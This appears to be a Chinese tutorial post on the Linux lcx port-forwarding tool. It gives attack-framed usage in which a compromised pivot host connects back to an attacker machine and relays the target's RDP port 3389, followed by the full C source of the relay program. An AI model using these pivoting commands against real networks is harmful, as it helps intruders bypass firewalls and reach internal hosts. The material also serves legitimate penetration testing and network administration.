lcx端口转发 linux版
一、端口转发使用
1、攻击机上执行以下命令
./lcx -p1 2222 -p2 3389 -m 2
在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口
2、跳板机上执行以下命令
./lcx -h1 attackip -p1 2222 -h2 dstip -p2 3389 -m 3
与攻击机建立连接,并将来自攻击机2222端口的数据全部转发到目标机端口的3389 端口
3、以上连接建立完成后,就可以通过连接攻击机的3389端口,进行访问目标机的3389端口
二、代码
/* Socket data transport tool * by bkbll(bkbll@cnhonker.net) * [bkbll@mobile socket]$ uname -a * Linux mobile 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux * [bkbll@mobile socket]$ gcc -o trtool trtool.c * [bkbll@mobile socket]$ ./trtool * Socket data transport tool * by bkbll(bkbll@cnhonker.net) * Usage:./trtool -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename] * -v: version * -h1: host1 * -h2: host2 * -p1: port1 * -p2: port2 * -log: log the data * -m: the action method for this tool * 1: listen on PORT1 and connect to HOST2:PORT2 * 2: listen on PORT1 and PORT2 * 3: connect to HOST1:PORT1 and HOST2:PORT2 */ #include <sys/time.h> #include <signal.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <string.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <netdb.h> #define VERSION "2.2" #define TIMEOUT 300 #define max(a,b) (a)>(b)?(a):(b) #define MAXSIZE 10240 #define HOSTLEN 40 #define CONNECT_NUMBER 5 /* define function here */ void usage(char *s); void transdata(int fd1,int fd2); void closeallfd(int); void makelog(char *buffer,int length); int testifisvalue(char *str); int bind2conn(int port1,char *host,int port2); int bind2bind(int port1,int port2); int conn2conn(char *host1,int port1,char *host2,int port2); int create_socket(); int create_serv(int sockfd,int port); int client_connect(int sockfd,char* server,int port); /* define GLOBAL varible here */ extern int errno; FILE *fp; int main(int argc,char **argv) { char **p; char host1[HOSTLEN],host2[HOSTLEN]; int port1=0,port2=0,method=0; int length; char *logfile=NULL; p=argv; memset(host1,0,HOSTLEN); memset(host2,0,HOSTLEN); while(*p) { if(strcmp(*p,"-v")==0) { printf("Socket data transport tool.\r\nVersion:%s\r\n",VERSION); p++; continue; } if(strcmp(*p,"-h1")==0) { if(testifisvalue(*(p+1))==1) { length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1)); strncpy(host1,*(++p),length); } p++; continue; } if(strcmp(*p,"-h2")==0) { if(testifisvalue(*(p+1))==1) { length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1)); strncpy(host2,*(++p),length); } p++; continue; } if(strcmp(*p,"-p1")==0) { if(testifisvalue(*(p+1))==1) port1=atoi(*(++p)); p++; continue; } if(strcmp(*p,"-p2")==0) { if(testifisvalue(*(p+1))==1) port2=atoi(*(++p)); p++; continue; } if(strcmp(*p,"-m")==0) { if(testifisvalue(*(p+1))==1) method=atoi(*(++p)); p++; continue; } if(strcmp(*p,"-log")==0) { if(testifisvalue(*(p+1))==1) logfile=*(++p); else { printf("[ERROR]:must supply logfile name\r\n"); exit(0); } p++; continue; } p++; } signal(SIGCLD,SIG_IGN); signal(SIGINT,&closeallfd); if(logfile !=NULL) { fp=fopen(logfile,"a"); if(fp == NULL ) { perror("open logfile"); exit(0); } } makelog("######################## start ################\r\n",49); switch(method) { case 0: usage(argv[0]); break; case 1: if((port1==0) || (port2==0)) { printf("[ERROR]:must supply PORT1 and PORT2.\r\n"); break; } if(strlen(host2)==0) { printf("[ERROR]:must supply HOST2.\r\n"); break; } bind2conn(port1,host2,port2); break; case 2: if((port1==0) || (port2==0)) { printf("[ERROR]:must supply PORT1 and PORT2.\r\n"); break; } bind2bind(port1,port2); break; case 3: if((port1==0) || (port2==0)) { printf("[ERROR]:must supply PORT1 and PORT2.\r\n"); break; } if(strlen(host1)==0) { printf("[ERROR]:must supply HOST1.\r\n"); break; } if(strlen(host2)==0) { printf("[ERROR]:must supply HOST2.\r\n"); break; } conn2conn(host1,port1,host2,port2); break; default: usage(argv[0]); } closeallfd(0); } int testifisvalue(char *str) { if(str == NULL ) return(0); if(str[0]=='-') return(0); return(1); } void usage(char *s) { printf("Socket data transport tool\r\n"); printf("by bkbll(bkbll@cnhonker.net)\r\n\r\n"); printf("Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]\r\n",s); printf(" -v: version\r\n"); printf(" -h1: host1\r\n"); printf(" -h2: host2\r\n"); printf(" -p1: port1\r\n"); printf(" -p2: port2\r\n"); printf(" -log: log the data\r\n"); printf(" -m: the action method for this tool\r\n"); printf(" 1: listen on PORT1 and connect to HOST2:PORT2\r\n"); printf(" 2: listen on PORT1 and PORT2\r\n"); printf(" 3: connect to HOST1:PORT1 and HOST2:PORT2\r\n"); closeallfd(0); } int bind2conn(int port1,char *host,int port2) { int sockfd,sockfd1,sockfd2; struct sockaddr_in remote; int size; int pid; char buffer[1024]; memset(buffer,0,1024); if((sockfd=create_socket())==0) exit(0); if(create_serv(sockfd,port1)==0) { close(sockfd1); exit(0); } size=sizeof(struct sockaddr); while(1) { printf("waiting for response.........\n"); if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,(socklen_t *)&size))<0) { perror("accept error\n"); continue; } printf("accept a client from %s:%d\n",inet_ntoa(remote.sin_addr),ntohs(remote.sin_port)); if((sockfd2=create_socket())==0) { close(sockfd1); continue; } printf("make a connection to %s:%d....",host,port2); fflush(stdout); if(client_connect(sockfd2,host,port2)==0) { close(sockfd2); sprintf(buffer,"[SERVER]connection to %s:%d error\r\n",host,port2); write(sockfd1,buffer,strlen(buffer)); memset(buffer,0,1024); close(sockfd1); continue; } printf("ok\r\n"); pid=fork(); if(pid==0) transdata(sockfd1,sockfd2); // sleep(2); close(sockfd1); close(sockfd2); } } int bind2bind(int port1,int port2) { int fd1,fd2,sockfd1,sockfd2; struct sockaddr_in client1,client2; int size1,size2; int pid; if((fd1=create_socket())==0) exit(0); if((fd2=create_socket())==0) exit(0); printf("binding port %d......",port1); fflush(stdout); if(create_serv(fd1,port1)==0) { close(fd1); exit(0); } printf("ok\r\n"); printf("binding port %d......",port2); fflush(stdout); if(create_serv(fd2,port2)==0) { close(fd2); exit(0); } printf("ok\r\n"); size1=size2=sizeof(struct sockaddr); while(1) { printf("waiting for response on port %d.........\n",port1); if((sockfd1=accept(fd1,(struct sockaddr *)&client1,(socklen_t *)&size1))<0) { perror("accept1 error"); continue; } printf("accept a client on port %d from %s,waiting another on port %d....\n",port1,inet_ntoa(client1.sin_addr),port2); if((sockfd2=accept(fd2,(struct sockaddr *)&client2,(socklen_t *)&size2))<0) { perror("accept2 error"); close(sockfd1); continue; } printf("accept a client on port %d from %s\n",port2,inet_ntoa(client2.sin_addr)); pid=fork(); if(pid==0) transdata(sockfd1,sockfd2); //sleep(2); close(sockfd1); close(sockfd2); } } int conn2conn(char *host1,int port1,char *host2,int port2) { int sockfd1,sockfd2; int pid; fd_set fds; int l; int result; char buffer[MAXSIZE]; while(1) { if((sockfd1=create_socket())==0) exit(0); if((sockfd2=create_socket())==0) exit(0); printf("[+] make a connection to %s:%d....\r\n",host1,port1); fflush(stdout); if(client_connect(sockfd1,host1,port1)==0) { printf("[-] connect to host1 failed\r\n"); close(sockfd1); close(sockfd2); continue; } printf("[+] host1 connected\r\n"); l=0; memset(buffer,0,MAXSIZE); //fixed by Twi1ight 2012.09.12 while(1) { FD_ZERO(&fds); FD_SET(sockfd1, &fds); if (select(sockfd1+1, &fds, NULL, NULL, NULL) < 0 ) { if (errno == EINTR) continue; break; } if (FD_ISSET(sockfd1, &fds)) { l=read(sockfd1, buffer, MAXSIZE); break; } sleep(5); } if(l<=0) { printf("[-] there is a error...Create a new connection.\r\n"); continue; } while(1) { printf("[+] make a connection to %s:%d....\r\n",host2,port2); fflush(stdout); if(client_connect(sockfd2,host2,port2)==0) { printf("[-] connect to host2 failed\r\n"); close(sockfd1); close(sockfd2); continue; } if(write(sockfd2,buffer,l) < 0) { printf("[-] send failed.\r\n"); continue; } l=0; memset(buffer,0,MAXSIZE); break; } printf("[+] all hosts connected!\r\n"); pid=fork(); if(pid==0) transdata(sockfd1,sockfd2); //sleep(2); close(sockfd1); close(sockfd2); } } void transdata(int fd1,int fd2) { struct timeval timeset; fd_set readfd,writefd; int result,i=0; char read_in1[MAXSIZE],send_out1[MAXSIZE]; char read_in2[MAXSIZE],send_out2[MAXSIZE]; int read1=0,totalread1=0,send1=0; int read2=0,totalread2=0,send2=0; int sendcount1,sendcount2; int maxfd; struct sockaddr_in client1,client2; int structsize1,structsize2; char host1[20],host2[20]; int port1=0,port2=0; char tmpbuf1[100],tmpbuf2[100]; memset(host1,0,20); memset(host2,0,20); memset(tmpbuf1,0,100); memset(tmpbuf2,0,100); if(fp!=NULL) { structsize1=sizeof(struct sockaddr); structsize2=sizeof(struct sockaddr); if(getpeername(fd1,(struct sockaddr *)&client1,(socklen_t *)&structsize1)<0) { strcpy(host1,"fd1"); } else { printf("got,ip:%s,port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port)); strcpy(host1,inet_ntoa(client1.sin_addr)); port1=ntohs(client1.sin_port); } if(getpeername(fd2,(struct sockaddr *)&client2,(socklen_t *)&structsize2)<0) { strcpy(host2,"fd2"); } else { printf("got,ip:%s,port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port)); strcpy(host2,inet_ntoa(client2.sin_addr)); port2=ntohs(client2.sin_port); } sprintf(tmpbuf1,"\r\n########### read from %s:%d ####################\r\n",host1,port1); sprintf(tmpbuf2,"\r\n########### reply from %s:%d ####################\r\n",host2,port2); } maxfd=max(fd1,fd2)+1; memset(read_in1,0,MAXSIZE); memset(read_in2,0,MAXSIZE); memset(send_out1,0,MAXSIZE); memset(send_out2,0,MAXSIZE); timeset.tv_sec=TIMEOUT; timeset.tv_usec=0; while(1) { FD_ZERO(&readfd); FD_ZERO(&writefd); FD_SET(fd1,&readfd); FD_SET(fd1,&writefd); FD_SET(fd2,&writefd); FD_SET(fd2,&readfd); result=select(maxfd,&readfd,&writefd,NULL,×et); if((result<0) && (errno!=EINTR)) { perror("select error"); break; } else if(result==0) { printf("time out\n"); break; } if(FD_ISSET(fd1,&readfd)) { /* 不能超过MAXSIZE-totalread1,不然send_out1会溢出 */ if(totalread1<MAXSIZE) { read1=read(fd1,read_in1,MAXSIZE-totalread1); if(read1==0) break; if((read1<0) && (errno!=EINTR)) { perror("read data error"); break; } memcpy(send_out1+totalread1,read_in1,read1); makelog(tmpbuf1,strlen(tmpbuf1)); makelog(read_in1,read1); totalread1+=read1; memset(read_in1,0,MAXSIZE); } } if(FD_ISSET(fd2,&writefd)) { int err=0; sendcount1=0; while(totalread1>0) { send1=write(fd2,send_out1+sendcount1,totalread1); if(send1==0)break; if((send1<0) && (errno!=EINTR)) { perror("unknow error"); err=1; break; } if((send1<0) && (errno==ENOSPC)) break; sendcount1+=send1; totalread1-=send1; } if(err==1) break; if((totalread1>0) && (sendcount1>0)) { /* 移动未发送完的数据到开始 */ memcpy(send_out1,send_out1+sendcount1,totalread1); memset(send_out1+totalread1,0,MAXSIZE-totalread1); } else memset(send_out1,0,MAXSIZE); } if(FD_ISSET(fd2,&readfd)) { if(totalread2<MAXSIZE) { read2=read(fd2,read_in2,MAXSIZE-totalread2); if(read2==0)break; if((read2<0) && (errno!=EINTR)) { perror("read data error"); break; } memcpy(send_out2+totalread2,read_in2,read2); makelog(tmpbuf2,strlen(tmpbuf2)); makelog(read_in2,read2); totalread2+=read2; memset(read_in2,0,MAXSIZE); } } if(FD_ISSET(fd1,&writefd)) { int err2=0; sendcount2=0; while(totalread2>0) { send2=write(fd1,send_out2+sendcount2,totalread2); if(send2==0)break; if((send2<0) && (errno!=EINTR)) { perror("unknow error"); err2=1; break; } if((send2<0) && (errno==ENOSPC)) break; sendcount2+=send2; totalread2-=send2; } if(err2==1) break; if((totalread2>0) && (sendcount2 > 0)) { /* 移动未发送完的数据到开始 */ memcpy(send_out2,send_out2+sendcount2,totalread2); memset(send_out2+totalread2,0,MAXSIZE-totalread2); } else memset(send_out2,0,MAXSIZE); } } close(fd1); close(fd2); printf("ok,I closed the two fd\r\n"); //exit(0); } void closeallfd(int n) { int i; printf("Let me exit..."); fflush(stdout); for(i=3;i<256;i++) { close(i); } if(fp != NULL) { fprintf(fp,"exited\r\n"); fclose(fp); } printf("all overd\r\n"); exit(0); } void makelog(char *buffer,int length) { if(fp !=NULL) { //fprintf(fp,"%s",buffer); write(fileno(fp),buffer,length); fflush(fp); } } int create_socket() { int sockfd; sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd<0) { perror("create socket error"); return(0); } return(sockfd); } int create_serv(int sockfd,int port) { struct sockaddr_in srvaddr; int on=1; bzero(&srvaddr,sizeof(struct sockaddr)); srvaddr.sin_port=htons(port); srvaddr.sin_family=AF_INET; srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on)); //so I can rebind the port if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0) { perror("error"); return(0); } if(listen(sockfd,CONNECT_NUMBER)<0) { perror("listen error\n"); return(0); } return(1); } int client_connect(int sockfd,char* server,int port) { struct sockaddr_in cliaddr; struct hostent *host; if(!(host=gethostbyname(server))) { printf("gethostbyname(%s) error:%s\n",server,strerror(errno)); return(0); } bzero(&cliaddr,sizeof(struct sockaddr)); cliaddr.sin_family=AF_INET; cliaddr.sin_port=htons(port); cliaddr.sin_addr=*((struct in_addr *)host->h_addr); if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0) { perror("[-] error"); return(0); } return(1); }